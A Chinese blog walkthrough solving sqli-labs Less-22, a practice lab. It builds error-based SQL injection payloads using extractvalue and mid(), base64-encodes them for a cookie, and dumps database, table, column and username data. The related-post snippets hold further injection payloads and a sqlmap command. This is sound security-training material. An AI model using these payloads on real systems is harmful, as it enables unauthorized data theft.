[网络安全]sqli-labs Less-22 解题详析

最新推荐文章于 2024-06-07 19:04:22 发布
最新推荐文章于 2024-06-07 19:04:22 发布
阅读量2.3k 收藏
点赞数
分类专栏: 网络安全 # Sqli-Labs靶场攻防实战 文章标签: web安全 数据库 sqlilabs 报错注入 加密注入 sql
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/132075049
版权

该题注入手法与Less-21相似,区别在于该题注入类型为双引号注入

原理参考所给链接,本文不再赘述: [网络安全]sqli-labs Less-21 解题详析

查库名

查库名

Dumb" and extractvalue(1,concat(0x23,database()))#

这里构造"的原因可通过页面回显得出,不再赘述。

经过加密得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLGRhdGFiYXNlKCkpKSM=

在这里插入图片描述

可知库名为security

查表名

Dumb" and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

加密后得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWEgPSBkYXRhYmFzZSgpKSkpIw==

在这里插入图片描述

得到四个表名

查列名

Dumb" and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

加密后得到

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYSA9IGRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnKSkpIw==

得到三个列:

在这里插入图片描述

查数据

该姿势使用到mid函数,参考文章: mid函数原理、应用及实战讲解

以获取username列的数据为例,利用mid函数构造POC:

Dumb" and extractvalue(1,concat(0x23,mid((select group_concat(username) from users),1,32)))#

加密后得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLG1pZCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksMSwzMikpKSM=

结果如图:

在这里插入图片描述

接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

Dumb" and extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32)))#

加密后得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLG1pZCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSBzZWN1cml0eS51c2VycyksMzIsMzIpKSkj

结果如图:

在这里插入图片描述

总结

以上为[网络安全]sqli-labs Less-22 解题详析,考察base64加密、报错注入、mid函数等知识点及姿势,后续将分享[网络安全]sqli-labs Less-23 解题详析。

我是秋说,我们下次见。

秋说
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs基础篇 第18~22关
Lucky小小吴的小屋
01-23 2345
sqli-labs基础篇 第18~22关,主要学习内容:burp抓包、数据包修改
sql-lab靶场原理解(1-22关)
cz020907020808的博客
06-01 983
id=1 'and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) – qwe 延时,说明数据库的第一个的第一位是e。id=1 'and if ((ascii(substr(database(),1,1))=115),sleep(5),1) --qwe 延时,说明数据库第一位是s。
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7360
sqli-labs,sql注入,burpsuit
sql-labs 5-22关(基础关)
qq_53859960的博客
08-08 106
查看源码, 发现如果sql语句正确,查到数据,会显示“You are in…”,如果错误,显示报错信息,这就给了报错注入,回显带着数据库有用的报错信息利用。构造解释:取出数据库的第一个字符串,并且将其转化成ascii,在进行比较,判断第一个字符,重复八次,数据库名为security。原因是union前后的查询的列数不一致,因此改为and 进行报错,但是前面的判断需要为真,不然后面的不执行。对查询到的第一个表名,取第一位字符,并且进行ascii转换,比较判断数据第一个字符的大小。
SqliLabs Less21-22
qq_45785324的博客
07-15 412
SqliLabs Less21 Less22
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,细全程,web注入实验,学习sql注入
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs第22关基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 460
第22关基于cookie报错注入 sqlmap 方法 python2 sqlmap.py -r 1.txt --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0 手注 一、判断注入点 通过源码我们可以发现,闭合点是双引号 然后我们基于21关进行构造语句 一、猜注入点: admin " and extractvalue(1,concat(0x7e,( 1),0x7e))# YWRtaW4gI
sqli-labs 20-22关
weixin_43061418的博客
09-01 499
cookie基本知识 20关 21关 22关
sqli-labs————less 22
Fly_鹏程万里
05-12 393
Less 22简单测试:username:adminpassword:aaa查看一下源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...
sqli-libs基础篇总结(1-22)
qq_33557485的博客
08-15 2416
1.关于sqli-labs 这个是sql注入的靶场。可以在git上下载。 2.题目简介 前面的1-22题都是sql注入的基础题目。覆盖范围很广,不过都是针对mysql数据库的。 1-4题:union注入 5-8题:布尔盲注 9-10题:延时盲注 11-12题:post形式的显错注入 13-16题:post形式的布尔盲注 17题:update语句的显错注入 18-19题:htt...
sqli-labs(22)
weixin_30339457的博客
05-27 183
接下里我们进入第二二关 好像和第21关一样 cookie的base64加密注入 闭合变成了双引号而已 0X01 构造语句进行尝试 " union select 1,2,3# IiB1bmlvbiBzZWxlY3QgMSwyLDMj 嘿嘿 好像成功了 那语句就不多说了 老规矩 一套组合拳打到低 切记 学习之路 少就是多 转载于:https:...
sqli-labs通关攻略1-22[Basic Injections]
Keepb1ue的博客
08-03 6855
基于单引号的报错字符型注入 先用单引号测试 根据报错信息可以知道多了个单引号,最外边的’‘的单引号可以忽略,它不是SQL语句中的单引号,而是报错提示根据报错位置添加的。很明显sql语句变成’1’’ LIMIT 0,1 ,而我们需要做的是闭合前面的语句,然后在后面拼接我们需要注入查询的语句。 查看源码 跟我们推测的一样,根据SQL语句闭合前面,注释后面的’ 拼接的原SQL语句如下:(红框是我们能控制的$id) 很明显,我们在前面拼接了一个’而把后面的’注释了 这样我们就能进行注入SQL语句进行查询我们想要的信
基于拓扑漏洞分网络安全态势感知模型
最新发布
attack2001的专栏
06-07 613
漏洞态势分是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分计算难以进行。
网络安全实战基础——实战工具与攻防环境介绍
Dijkstra's Monk-ey的博客
06-05 983
实战集成工具虚拟机VMware Workstation:大家熟知的虚拟机Virtual Box:开源免费、轻量级Kali Linux工具集信息收集BlackArch LinuxMetasploit集成在Kali Linux系统中基本模块如下:渗透模块 辅助模块 攻击载荷模块 Shellcode模块其他渗透工具集成系统 1. 报错型注入(Union Select),包括字符串型和数字型报错型注入(基于二次注入)盲注,包括普通判定注入和基于时间的注入。更新查询注入。插入查询注入。HTTP头部注入
网络安全第一课
Ying_hao_kun的博客
06-04 531
两台服务器访问必须知道对方的ip,但是ip太难记了,所以有了域名代替IP ,dns的作用就是解域名变成ip,有了这个之后,访问其他有域名的网站,就不需要再去记ip了,但是我们一定要记住dns服务器的ip,百度服务器的ip假如是200.1.1.3,那么就必须经过网关才可以访问,也就是访问外网必须经过网关处理,这里其中的原理就暂时先不分享了,网关的本机名一般都是第一个或者最后一个。子网掩码(跟IP地址是情侣,不能单身,有ip必须有子网掩码),在同一局域网中,所有的ip必须在同一网段中才能够进行通信。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值